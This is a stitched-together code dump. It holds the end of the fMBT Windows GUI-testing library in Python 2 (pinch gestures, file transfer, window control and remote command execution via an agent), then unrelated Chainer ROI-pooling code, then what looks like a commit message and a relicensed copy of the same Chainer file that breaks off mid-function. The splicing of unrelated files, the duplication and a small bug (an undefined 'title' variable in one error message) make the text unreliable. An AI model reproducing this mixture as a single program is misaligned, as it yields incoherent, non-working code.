if x == None: x = 0.5
if y == None: y = 0.5
x, y = self.intCoords((x, y))
if type(startDistance) == float and 0.0 <= startDistance <= 1.0:
startDistanceInPixels = (startDistance *
max(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
else: startDistanceInPixels = int(startDistance)
if type(endDistance) == float and 0.0 <= endDistance <= 1.0:
endDistanceInPixels = (endDistance *
max(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
else: endDistanceInPixels = int(endDistance)
finger1startX = int(x + math.cos(math.radians(finger1Dir)) * startDistanceInPixels)
finger1startY = int(y - math.sin(math.radians(finger1Dir)) * startDistanceInPixels)
finger1endX = int(x + math.cos(math.radians(finger1Dir)) * endDistanceInPixels)
finger1endY = int(y - math.sin(math.radians(finger1Dir)) * endDistanceInPixels)
finger2startX = int(x + math.cos(math.radians(finger2Dir)) * startDistanceInPixels)
finger2startY = int(y - math.sin(math.radians(finger2Dir)) * startDistanceInPixels)
finger2endX = int(x + math.cos(math.radians(finger2Dir)) * endDistanceInPixels)
finger2endY = int(y - math.sin(math.radians(finger2Dir)) * endDistanceInPixels)
self.existingConnection().sendPinch(
(finger1startX, finger1startY), (finger1endX, finger1endY),
(finger2startX, finger2startY), (finger2endX, finger2endY),
movePoints, duration)
return True
def pinchOpen(self, (x, y) = (0.5, 0.5), startDistance=0.1, endDistance=0.5, **pinchKwArgs):
"""
Make the open pinch gesture.
Parameters:
x, y (integer, optional):
the central point of the gesture, the default is in
the middle of the screen.
startDistance, endDistance (float, optional):
refer to pinch documentation. The default is 0.1 and
0.5.
for the rest of the parameters, refer to pinch documentation.
"""
return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def pinchClose(self, (x, y) = (0.5, 0.5), startDistance=0.5, endDistance=0.1, **pinchKwArgs):
"""
Make the close pinch gesture.
Parameters:
x, y (integer, optional):
the central point of the gesture, the default is in
the middle of the screen.
startDistance, endDistance (float, optional):
refer to pinch documentation. The default is 0.5 and
0.1.
rest of the parameters: refer to pinch documentation.
"""
return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def putFile(self, localFilename, remoteFilepath):
"""
Send local file to the device
Parameters:
localFilename (string):
file to be sent.
remoteFilepath (string):
destination on the device. If destination is an
existing directory, the file will be saved to the
directory with its original name. Otherwise the file
will be saved with remoteFilepath as new name.
"""
return self._conn.sendFile(localFilename, remoteFilepath)
def refreshView(self, window=None, forcedView=None):
"""
(Re)reads widgets on the top window and updates the latest view.
Parameters:
window (integer (hWnd) or string (title), optional):
read widgets from given window instead of the top window.
forcedView (View or filename, optional):
use given View object or view file instead of reading the
items from the device.
Returns View object.
"""
if forcedView != None:
if isinstance(forcedView, View):
self._lastView = forcedView
elif type(forcedView) in [str, unicode]:
self._lastView = View(forcedView,
ast.literal_eval(file(forcedView).read()))
else:
if self.screenshotDir() == None:
self.setScreenshotDir(self._screenshotDirDefault)
if self.screenshotSubdir() == None:
self.setScreenshotSubdir(self._screenshotSubdirDefault)
viewFilename = self._newScreenshotFilepath()[:-3] + "view"
viewData = self._conn.recvViewData(window)
file(viewFilename, "w").write(repr(viewData))
self._lastView = View(viewFilename, viewData)
return self._lastView
def setDisplaySize(self, size):
"""
Transform coordinates of synthesized events (like a tap) from
screenshot resolution to display input area size. By default
events are synthesized directly to screenshot coordinates.
Parameters:
size (pair of integers: (width, height)):
width and height of display in pixels. If not given,
values from EnumDisplayMonitors are used.
Returns None.
"""
width, height = size
screenWidth, screenHeight = self.screenSize()
self._conn.setScreenToDisplayCoords(
lambda x, y: (x * width / screenWidth,
y * height / screenHeight))
self._conn.setDisplayToScreenCoords(
lambda x, y: (x * screenWidth / width,
y * screenHeight / height))
def setForegroundWindow(self, window):
"""
Set a window with the title as a foreground window
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetForegroundWindow(window)
def setScreenshotSize(self, size):
"""
Force screenshots from device to use given resolution.
Overrides detected monitor resolution on device.
Parameters:
size (pair of integers: (width, height)):
width and height of screenshot.
"""
self._conn.setScreenshotSize(size)
def shell(self, command):
"""
Execute command in Windows.
Parameters:
command (string or list of strings):
command to be executed. Will be forwarded directly
to subprocess.check_output. If command is a string,
then it will be executed in subshell, otherwise without
shell.
Returns what is printed by the command.
If you wish to receive exitstatus or standard output and error
separated from command, refer to shellSOE().
"""
return self._conn.evalPython('shell(%s)' % (repr(command),))
def shellSOE(self, command, asyncStatus=None, asyncOut=None, asyncError=None):
"""
Execute command on Windows.
Parameters:
command (string or list of strings):
command to be executed. If command is a list of
string, it will be executed without shell
(subprocess.check_output with shell=False).
If command is a single-line string, it will be
executed in shell (subprocess.check_output with
shell=True).
If command is a multiline string, it will be written
to a BAT file and executed as a script.
asyncStatus (string or None)
filename (on device) to which the status of
asynchronously executed shellCommand will be
written. The default is None, that is, command will
be run synchronously, and status will be returned in
the tuple.
asyncOut (string or None)
filename (on device) to which the standard output of
asynchronously executed shellCommand will be
written. The default is None.
asyncError (string or None)
filename (on device) to which the standard error of
asynchronously executed shellCommand will be
written. The default is None.
Returns triplet: exit status, standard output and standard error
from the command.
If executing command fails, returns None, None, None.
"""
return self._conn.evalPython(
'shellSOE(%s, asyncStatus=%s, asyncOut=%s, asyncError=%s)'
% (repr(command),
repr(asyncStatus), repr(asyncOut), repr(asyncError)))
def showWindow(self, window, showCmd=SW_NORMAL):
"""
Send showCmd to window.
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
showCmd (integer or string):
command to be sent. Valid commands are 0..11:
SW_HIDE, SW_NORMAL, SW_MINIMIZED, SW_MAXIMIZE,
SW_NOACTIVATE, SW_SHOW SW_MINIMIZE, SW_MINNOACTIVE,
SW_SHOWNA, SW_RESTORE, SW_DEFAULT, SW_FORCEMINIMIZE.
Returns True if the window was previously visible,
otherwise False.
Notes: calls ShowWindow in user32.dll.
"""
return self.existingConnection().sendShowWindow(window, showCmd)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
tapPos (pair of floats (x, y)):
refer to tapItem documentation.
button, long, hold, count, delayBetweenTaps (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
items = self.existingView().findItemsByText(text, partial=partial, count=1)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topWindowProperties(self):
"""
Return properties of the top window as a dictionary
"""
return self._conn.recvTopWindowProperties()
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1) != []
def windowList(self):
"""
Return list of properties of windows (dictionaries)
Example: list window handles and titles:
for props in d.windowList():
print props["hwnd"], props["title"]
"""
return self._conn.recvWindowList()
def launchHTTPD(self):
"""
DEPRECATED, will be removed, do not use!
"""
return self._conn.evalPython("launchHTTPD()")
def stopHTTPD(self):
"""
DEPRECATED, will be removed, do not use!
"""
return self._conn.evalPython("stopHTTPD()")
def view(self):
return self._lastView
class WindowsConnection(fmbtgti.GUITestConnection):
def __init__(self, connspec, password):
fmbtgti.GUITestConnection.__init__(self)
self._screenshotSize = (None, None) # autodetect
self._agent = pythonshare.connection(connspec, password=password)
self._agent_ns = self._agent.namespace()
agentFilename = os.path.join(
os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
"fmbtwindows_agent.py")
self._agent.exec_in(self._agent_ns, file(agentFilename).read())
self.setScreenToDisplayCoords(lambda x, y: (x, y))
self.setDisplayToScreenCoords(lambda x, y: (x, y))
def setScreenshotSize(self, screenshotSize):
self._screenshotSize = screenshotSize
screenW, screenH = self._screenshotSize
inputW, inputH = self._agent.eval_in(self._agent_ns, "_mouse_input_area")
self.setScreenToDisplayCoords(
lambda x, y: (x * inputW / screenW, y * inputH / screenH))
self.setDisplayToScreenCoords(
lambda x, y: (x * screenW / inputW, y * screenH / inputH))
def execPython(self, code):
return self._agent.exec_in(self._agent_ns, code)
def evalPython(self, code):
return self._agent.eval_in(self._agent_ns, code)
def recvFile(self, remoteFilename, localFilename=None):
data = self._agent.eval_in(self._agent_ns, "file(%s, 'rb').read()" % (repr(remoteFilename),))
if localFilename:
file(localFilename, "wb").write(data)
return True
else:
return data
def sendFile(self, localFilename, remoteFilepath):
data = file(localFilename).read()
rv = self.evalPython('saveFile(%s, %s, base64.b64decode(%s))' %
(repr(os.path.basename(localFilename)),
repr(remoteFilepath),
repr(base64.b64encode(data))))
return rv
def recvMatchingPaths(self, pathnamePattern):
return self._agent.eval_in(self._agent_ns,
"glob.glob(%s)" % (repr(pathnamePattern),))
def recvScreenshot(self, filename, screenshotSize=(None, None)):
ppmfilename = filename + ".ppm"
if screenshotSize == (None, None):
screenshotSize = self._screenshotSize
width, height, zdata = self._agent.eval_in(
self._agent_ns, "screenshotZYBGR(%s)" % (repr(screenshotSize),))
data = zlib.decompress(zdata)
fmbtgti.eye4graphics.wbgr2rgb(data, width, height)
if fmbtpng != None:
file(filename, "wb").write(
fmbtpng.raw2png(data, width, height, 8, "RGB"))
else:
ppm_header = "P6\n%d %d\n%d\n" % (width, height, 255)
f = file(filename + ".ppm", "wb")
f.write(ppm_header)
f.write(data)
f.close()
_run([fmbt_config.imagemagick_convert, ppmfilename, filename], expectedExitStatus=[0])
os.remove(ppmfilename)
return True
def recvTopWindowProperties(self):
return self.evalPython("topWindowProperties()")
def recvViewData(self, window=None):
if window == None:
rv = self.evalPython("topWindowWidgets()")
elif isinstance(window, int):
rv = self.evalPython("windowWidgets(%s)" % (repr(window),))
elif isinstance(window, str) or isinstance(window, unicode):
wlist = self.evalPython("windowList()")
for w in wlist:
if w["title"] == window:
rv = self.evalPython("windowWidgets(%s)" % (repr(w["hwnd"]),))
break
else:
raise ValueError('no window with title "%s"' % (window,))
else:
raise ValueError('illegal window "%s", expected integer or string (hWnd or title)' % (window,))
return rv
def recvWindowList(self):
return self.evalPython("windowList()")
def _window2hwnd(self, window):
if isinstance(window, str) or isinstance(window, unicode):
windowList = self.recvWindowList()
hwndList = [w["hwnd"] for w in windowList if w["title"] == window]
if not hwndList:
raise ValueError('no window with title "%s"' % (title,))
hwnd = hwndList[0]
elif isinstance(window, int):
hwnd = window
else:
raise ValueError('invalid window "%s", string or integer expected' % (window,))
return hwnd
def sendSetForegroundWindow(self, window):
hwnd = self._window2hwnd(window)
return 0 != self.evalPython("ctypes.windll.user32.SetForegroundWindow(%s)" %
(repr(hwnd),))
def sendShowWindow(self, window, showCmd):
hwnd = self._window2hwnd(window)
if isinstance(showCmd, str) or isinstance(showCmd, unicode):
if showCmd in _g_showCmds:
showCmd = _g_showCmds.index(showCmd)
else:
raise ValueError('invalid showCmd: "%s"' % (showCmd,))
return 0 != self.evalPython("ctypes.windll.user32.ShowWindow(%s, %s)" %
(repr(hwnd), repr(showCmd)))
def sendType(self, text):
command = 'sendType(%s)' % (repr(text),)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPress(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKey("%s",[])' % (keyCode,)
else:
command = 'sendKey("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyDown(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyDown("%s",[])' % (keyCode,)
else:
command = 'sendKeyDown("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyUp(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyUp("%s",[])' % (keyCode,)
else:
command = 'sendKeyUp("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendTap(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTap(%s, %s)" % (x, y)
else:
command = "sendClick(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchDown(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchDown(%s, %s)" % (x, y)
else:
command = "(sendMouseMove(%s, %s), sendMouseDown(%s))" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchMove(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchMove(%s, %s)" % (x, y)
else:
command = "sendMouseMove(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchUp(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchUp(%s, %s)" % (x, y)
else:
command = "sendMouseUp(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPinch(self, *args):
self.evalPython("touchPinch%s" % (args,))
return True
def setScreenToDisplayCoords(self, screenToDisplayFunction):
self._screenToDisplay = screenToDisplayFunction
def setDisplayToScreenCoords(self, displayToScreenFunction):
self._displayToScreen = displayToScreenFunction
class FMBTWindowsError(Exception): pass
|
import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
def _roi_pooling_slice(size, stride, max_size, roi_offset):
start = int(numpy.floor(size * stride))
end = int(numpy.ceil((size + 1) * stride))
start = min(max(start + roi_offset, 0), max_size)
end = min(max(end + roi_offset, 0), max_size)
return slice(start, end), end - start
class ROIPooling2D(function.Function):
"""RoI pooling over a set of 2d planes."""
def __init__(self, outh, outw, spatial_scale):
self.outh, self.outw = outh, outw
self.spatial_scale = spatial_scale
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
x_type, roi_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 4,
roi_type.dtype == numpy.float32,
roi_type.ndim == 2,
roi_type.shape[1] == 5,
)
def forward_cpu(self, inputs):
bottom_data, bottom_rois = inputs
n_rois, channels, height, width = bottom_data.shape
top_data = numpy.empty((n_rois, channels, self.outh, self.outw),
dtype=numpy.float32)
self.argmax_data = numpy.empty_like(top_data).astype(numpy.int32)
for i_roi in six.moves.range(n_rois):
idx, xmin, ymin, xmax, ymax = bottom_rois[i_roi]
xmin = int(round(xmin * self.spatial_scale))
xmax = int(round(xmax * self.spatial_scale))
ymin = int(round(ymin * self.spatial_scale))
ymax = int(round(ymax * self.spatial_scale))
roi_width = max(xmax - xmin + 1, 1)
roi_height = max(ymax - ymin + 1, 1)
strideh = 1. * roi_height / self.outh
stridew = 1. * roi_width / self.outw
for outh in six.moves.range(self.outh):
sliceh, lenh = _roi_pooling_slice(
outh, strideh, height, ymin)
if sliceh.stop <= sliceh.start:
continue
for outw in six.moves.range(self.outw):
slicew, lenw = _roi_pooling_slice(
outw, stridew, width, xmin)
if slicew.stop <= slicew.start:
continue
roi_data = bottom_data[int(idx), :, sliceh, slicew]\
.reshape(channels, -1)
top_data[i_roi, :, outh, outw] =\
numpy.max(roi_data, axis=1)
# get the max idx respect to feature_maps coordinates
max_idx_slice = numpy.unravel_index(
numpy.argmax(roi_data, axis=1), (lenh, lenw))
max_idx_slice_h = max_idx_slice[0] + sliceh.start
max_idx_slice_w = max_idx_slice[1] + slicew.start
max_idx_slice = max_idx_slice_h * width + max_idx_slice_w
self.argmax_data[i_roi, :, outh, outw] = max_idx_slice
return top_data,
def forward_gpu(self, inputs):
bottom_data, bottom_rois = inputs
channels, height, width = bottom_data.shape[1:]
n_rois = bottom_rois.shape[0]
top_data = cuda.cupy.empty((n_rois, channels, self.outh,
self.outw), dtype=numpy.float32)
self.argmax_data = cuda.cupy.empty_like(top_data).astype(numpy.int32)
cuda.cupy.ElementwiseKernel(
'''
raw float32 bottom_data, float32 spatial_scale, int32 channels,
int32 height, int32 width, int32 pooled_height, int32 pooled_width,
raw float32 bottom_rois
''',
'float32 top_data, int32 argmax_data',
'''
// pos in output filter
int pw = i % pooled_width;
int ph = (i / pooled_width) % pooled_height;
int c = (i / pooled_width / pooled_height) % channels;
int num = i / pooled_width / pooled_height / channels;
int roi_batch_ind = bottom_rois[num * 5 + 0];
int roi_start_w = round(bottom_rois[num * 5 + 1] * spatial_scale);
int roi_start_h = round(bottom_rois[num * 5 + 2] * spatial_scale);
int roi_end_w = round(bottom_rois[num * 5 + 3] * spatial_scale);
int roi_end_h = round(bottom_rois[num * 5 + 4] * spatial_scale);
// Force malformed ROIs to be 1x1
int roi_width = max(roi_end_w - roi_start_w + 1, 1);
int roi_height = max(roi_end_h - roi_start_h + 1, 1);
float bin_size_h = static_cast<float>(roi_height)
/ static_cast<float>(pooled_height);
float bin_size_w = static_cast<float>(roi_width)
/ static_cast<float>(pooled_width);
int hstart = static_cast<int>(floor(static_cast<float>(ph)
* bin_size_h));
int wstart = static_cast<int>(floor(static_cast<float>(pw)
* bin_size_w));
int hend = static_cast<int>(ceil(static_cast<float>(ph + 1)
* bin_size_h));
int wend = static_cast<int>(ceil(static_cast<float>(pw + 1)
* bin_size_w));
// Add roi offsets and clip to input boundaries
hstart = min(max(hstart + roi_start_h, 0), height);
hend = min(max(hend + roi_start_h, 0), height);
wstart = min(max(wstart + roi_start_w, 0), width);
wend = min(max(wend + roi_start_w, 0), width);
bool is_empty = (hend <= hstart) || (wend <= wstart);
// Define an empty pooling region to be zero
float maxval = is_empty ? 0 : -1E+37;
// If nothing is pooled, argmax=-1 causes nothing to be backprop'd
int maxidx = -1;
int data_offset = (roi_batch_ind * channels + c) * height * width;
for (int h = hstart; h < hend; ++h) {
for (int w = wstart; w < wend; ++w) {
int bottom_index = h * width + w;
if (bottom_data[data_offset + bottom_index] > maxval) {
maxval = bottom_data[data_offset + bottom_index];
maxidx = bottom_index;
}
}
}
top_data = maxval;
argmax_data = maxidx;
''', 'roi_poolig_2d_fwd'
)(bottom_data, self.spatial_scale, channels, height, width,
self.outh, self.outw, bottom_rois, top_data,
self.argmax_data)
return top_data,
def backward_cpu(self, inputs, gy):
bottom_data, bottom_rois = inputs
n_rois, channels, height, width = bottom_data.shape
bottom_delta = numpy.zeros_like(bottom_data, dtype=numpy.float32)
for i_roi in six.moves.range(n_rois):
idx, xmin, ymin, xmax, ymax = bottom_rois[i_roi]
idx = int(idx)
xmin = int(round(xmin * self.spatial_scale))
xmax = int(round(xmax * self.spatial_scale))
ymin = int(round(ymin * self.spatial_scale))
ymax = int(round(ymax * self.spatial_scale))
roi_width = max(xmax - xmin + 1, 1)
roi_height = max(ymax - ymin + 1, 1)
strideh = float(roi_height) / float(self.outh)
stridew = float(roi_width) / float(self.outw)
# iterate all the w, h (from feature map) that fall into this ROIs
for w in six.moves.range(xmin, xmax + 1):
for h in six.moves.range(ymin, ymax + 1):
phstart = int(numpy.floor(float(h - ymin) / strideh))
phend = int(numpy.ceil(float(h - ymin + 1) / strideh))
pwstart = int(numpy.floor(float(w - xmin) / stridew))
pwend = int(numpy.ceil(float(w - xmin + 1) / stridew))
phstart = min(max(phstart, 0), self.outh)
phend = min(max(phend, 0), self.outh)
pwstart = min(max(pwstart, 0), self.outw)
pwend = min(max(pwend, 0), self.outw)
for ph in six.moves.range(phstart, phend):
for pw in six.moves.range(pwstart, pwend):
max_idx_tmp = self.argmax_data[i_roi, :, ph, pw]
for c in six.moves.range(channels):
if max_idx_tmp[c] == (h * width + w):
bottom_delta[idx, c, h, w] += \
gy[0][i_roi, c, ph, pw]
return bottom_delta, None
def backward_gpu(self, inputs, gy):
bottom_data, bottom_rois = inputs
channels, height, width = bottom_data.shape[1:]
bottom_diff = cuda.cupy.zeros_like(bottom_data, dtype=numpy.float32)
cuda.cupy.ElementwiseKernel(
'''
raw float32 top_diff, raw int32 argmax_data, int32 num_rois,
float32 spatial_scale, int32 channels, int32 height, int32 width,
int32 pooled_height, int32 pooled_width, raw float32 bottom_rois
''',
'float32 bottom_diff',
'''
int w = i % width;
int h = (i / width) % height;
int c = (i / width / height) % channels;
int num = i / width / height / channels;
float gradient = 0;
// Accumulate gradient over all ROIs that pooled this element
for (int roi_n = 0; roi_n < num_rois; ++roi_n) {
// Skip if ROI's batch index doesn't match num
if (num != static_cast<int>(bottom_rois[roi_n * 5])) {
continue;
}
int roi_start_w = round(bottom_rois[roi_n * 5 + 1]
* spatial_scale);
int roi_start_h = round(bottom_rois[roi_n * 5 + 2]
* spatial_scale);
int roi_end_w = round(bottom_rois[roi_n * 5 + 3]
* spatial_scale);
int roi_end_h = round(bottom_rois[roi_n * 5 + 4]
* spatial_scale);
// Skip if ROI doesn't include (h, w)
const bool in_roi = (w >= roi_start_w && w <= roi_end_w &&
h >= roi_start_h && h <= roi_end_h);
if (!in_roi) {
continue;
}
int offset = (roi_n * channels + c) * pooled_height
* pooled_width;
// Compute feasible set of pooled units that could have pooled
// this bottom unit
// Force malformed ROIs to be 1x1
int roi_width = max(roi_end_w - roi_start_w + 1, 1);
int roi_height = max(roi_end_h - roi_start_h + 1, 1);
float bin_size_h = static_cast<float>(roi_height)
/ static_cast<float>(pooled_height);
float bin_size_w = static_cast<float>(roi_width)
/ static_cast<float>(pooled_width);
int phstart = floor(static_cast<float>(h - roi_start_h)
/ bin_size_h);
int phend = ceil(static_cast<float>(h - roi_start_h + 1)
/ bin_size_h);
int pwstart = floor(static_cast<float>(w - roi_start_w)
/ bin_size_w);
int pwend = ceil(static_cast<float>(w - roi_start_w + 1)
/ bin_size_w);
phstart = min(max(phstart, 0), pooled_height);
phend = min(max(phend, 0), pooled_height);
pwstart = min(max(pwstart, 0), pooled_width);
pwend = min(max(pwend, 0), pooled_width);
for (int ph = phstart; ph < phend; ++ph) {
for (int pw = pwstart; pw < pwend; ++pw) {
int index_ = ph * pooled_width + pw + offset;
if (argmax_data[index_] == (h * width + w)) {
gradient += top_diff[index_];
}
}
}
}
bottom_diff = gradient;
''', 'roi_pooling_2d_bwd'
)(gy[0], self.argmax_data, bottom_rois.shape[0], self.spatial_scale,
channels, height, width, self.outh, self.outw,
bottom_rois, bottom_diff)
return bottom_diff, None
def roi_pooling_2d(x, rois, outh, outw, spatial_scale):
"""Spatial Region of Interest (ROI) pooling function.
This function acts similarly to :class:`~functions.MaxPooling2D`, but
it computes the maximum of input spatial patch for each channel
with the region of interest.
Args:
x (~chainer.Variable): Input variable.
rois (~chainer.Variable): Input roi variable.
outh (int): Height of output image after pooled.
outw (int): Width of output image after pooled.
spatial_scale (float): scale of the roi is resized.
Returns:
~chainer.Variable: Ouptut variable.
"""
return ROIPooling2D(outh, outw, spatial_scale)(x, rois)
Add license declaration and citation of paper
# Modified work:
# -----------------------------------------------------------------------------
# Copyright (c) 2015 Preferred Infrastructure, Inc.
# Copyright (c) 2015 Preferred Networks, Inc.
# -----------------------------------------------------------------------------
# Original work of _roi_pooling_slice, forward_cpu and backward_cpu:
# -----------------------------------------------------------------------------
# Copyright 2014 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
# Original work of forward_gpu and backward_gpu:
# -----------------------------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see fast-rcnn/LICENSE for details]
# Written by Ross Girshick
# -----------------------------------------------------------------------------
import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
def _roi_pooling_slice(size, stride, max_size, roi_offset):
start = int(numpy.floor(size * stride))
end = int(numpy.ceil((size + 1) * stride))
start = min(max(start + roi_offset, 0), max_size)
end = min(max(end + roi_offset, 0), max_size)
return slice(start, end), end - start
class ROIPooling2D(function.Function):
"""RoI pooling over a set of 2d planes."""
def __init__(self, outh, outw, spatial_scale):
self.outh, self.outw = outh, outw
self.spatial_scale = spatial_scale
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 2)
x_type, roi_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 4,
roi_type.dtype == numpy.float32,
roi_type.ndim == 2,
roi_type.shape[1] == 5,
)
def forward_cpu(self, inputs):
bottom_data, bottom_rois = inputs
n_rois, channels, height, width = bottom_data.shape
top_data = numpy.empty((n_rois, channels, self.outh, self.outw),
dtype=numpy.float32)
self.argmax_data = numpy.empty_like(top_data).astype(numpy.int32)
for i_roi in six.moves.range(n_rois):
idx, xmin, ymin, xmax, ymax = bottom_rois[i_roi]
xmin = int(round(xmin * self.spatial_scale))
xmax = int(round(xmax * self.spatial_scale))
ymin = int(round(ymin * self.spatial_scale))
ymax = int(round(ymax * self.spatial_scale))
roi_width = max(xmax - xmin + 1, 1)
roi_height = max(ymax - ymin + 1, 1)
strideh = 1. * roi_height / self.outh
stridew = 1. * roi_width / self.outw
for outh in six.moves.range(self.outh):
sliceh, lenh = _roi_pooling_slice(
outh, strideh, height, ymin)
if sliceh.stop <= sliceh.start:
continue
for outw in six.moves.range(self.outw):
slicew, lenw = _roi_pooling_slice(
outw, stridew, width, xmin)
if slicew.stop <= slicew.start:
continue
roi_data = bottom_data[int(idx), :, sliceh, slicew]\
.reshape(channels, -1)
top_data[i_roi, :, outh, outw] =\
numpy.max(roi_data, axis=1)
# get the max idx respect to feature_maps coordinates
max_idx_slice = numpy.unravel_index(
numpy.argmax(roi_data, axis=1), (lenh, lenw))
max_idx_slice_h = max_idx_slice[0] + sliceh.start
max_idx_slice_w = max_idx_slice[1] + slicew.start
max_idx_slice = max_idx_slice_h * width + max_idx_slice_w
self.argmax_data[i_roi, :, outh, outw] = max_idx_slice
return top_data,
def forward_gpu(self, inputs):
bottom_data, bottom_rois = inputs
channels, height, width = bottom_data.shape[1:]
n_rois = bottom_rois.shape[0]
top_data = cuda.cupy.empty((n_rois, channels, self.outh,
self.outw), dtype=numpy.float32)
self.argmax_data = cuda.cupy.empty_like(top_data).astype(numpy.int32)
cuda.cupy.ElementwiseKernel(
'''
raw float32 bottom_data, float32 spatial_scale, int32 channels,
int32 height, int32 width, int32 pooled_height, int32 pooled_width,
raw float32 bottom_rois
''',
'float32 top_data, int32 argmax_data',
'''
// pos in output filter
int pw = i % pooled_width;
int ph = (i / pooled_width) % pooled_height;
int c = (i / pooled_width / pooled_height) % channels;
int num = i / pooled_width / pooled_height / channels;
int roi_batch_ind = bottom_rois[num * 5 + 0];
int roi_start_w = round(bottom_rois[num * 5 + 1] * spatial_scale);
int roi_start_h = round(bottom_rois[num * 5 + 2] * spatial_scale);
int roi_end_w = round(bottom_rois[num * 5 + 3] * spatial_scale);
int roi_end_h = round(bottom_rois[num * 5 + 4] * spatial_scale);
// Force malformed ROIs to be 1x1
int roi_width = max(roi_end_w - roi_start_w + 1, 1);
int roi_height = max(roi_end_h - roi_start_h + 1, 1);
float bin_size_h = static_cast<float>(roi_height)
/ static_cast<float>(pooled_height);
float bin_size_w = static_cast<float>(roi_width)
/ static_cast<float>(pooled_width);
int hstart = static_cast<int>(floor(static_cast<float>(ph)
* bin_size_h));
int wstart = static_cast<int>(floor(static_cast<float>(pw)
* bin_size_w));
int hend = static_cast<int>(ceil(static_cast<float>(ph + 1)
* bin_size_h));
int wend = static_cast<int>(ceil(static_cast<float>(pw + 1)
* bin_size_w));
// Add roi offsets and clip to input boundaries
hstart = min(max(hstart + roi_start_h, 0), height);
hend = min(max(hend + roi_start_h, 0), height);
wstart = min(max(wstart + roi_start_w, 0), width);
wend = min(max(wend + roi_start_w, 0), width);
bool is_empty = (hend <= hstart) || (wend <= wstart);
// Define an empty pooling region to be zero
float maxval = is_empty ? 0 : -1E+37;
// If nothing is pooled, argmax=-1 causes nothing to be backprop'd
int maxidx = -1;
int data_offset = (roi_batch_ind * channels + c) * height * width;
for (int h = hstart; h < hend; ++h) {
for (int w = wstart; w < wend; ++w) {
int bottom_index = h * width + w;
if (bottom_data[data_offset + bottom_index] > maxval) {
maxval = bottom_data[data_offset + bottom_index];
maxidx = bottom_index;
}
}
}
top_data = maxval;
argmax_data = maxidx;
''', 'roi_poolig_2d_fwd'
)(bottom_data, self.spatial_scale, channels, height, width,
self.outh, self.outw, bottom_rois, top_data,
self.argmax_data)
return top_data,
def backward_cpu(self, inputs, gy):
bottom_data, bottom_rois = inputs
n_rois, channels, height, width = bottom_data.shape
bottom_delta = numpy.zeros_like(bottom_data, dtype=numpy.float32)
for i_roi in six.moves.range(n_rois):
idx, xmin, ymin, xmax, ymax = bottom_rois[i_roi]
idx = int(idx)
xmin = int(round(xmin * self.spatial_scale))
xmax = int(round(xmax * self.spatial_scale))
ymin = int(round(ymin * self.spatial_scale))
ymax = int(round(ymax * self.spatial_scale))
roi_width = max(xmax - xmin + 1, 1)
roi_height = max(ymax - ymin + 1, 1)
strideh = float(roi_height) / float(self.outh)
stridew = float(roi_width) / float(self.outw)
# iterate all the w, h (from feature map) that fall into this ROIs
for w in six.moves.range(xmin, xmax + 1):
for h in six.moves.range(ymin, ymax + 1):
phstart = int(numpy.floor(float(h - ymin) / strideh))
phend = int(numpy.ceil(float(h - ymin + 1) / strideh))
pwstart = int(numpy.floor(float(w - xmin) / stridew))
pwend = int(numpy.ceil(float(w - xmin + 1) / stridew))
phstart = min(max(phstart, 0), self.outh)
phend = min(max(phend, 0), self.outh)
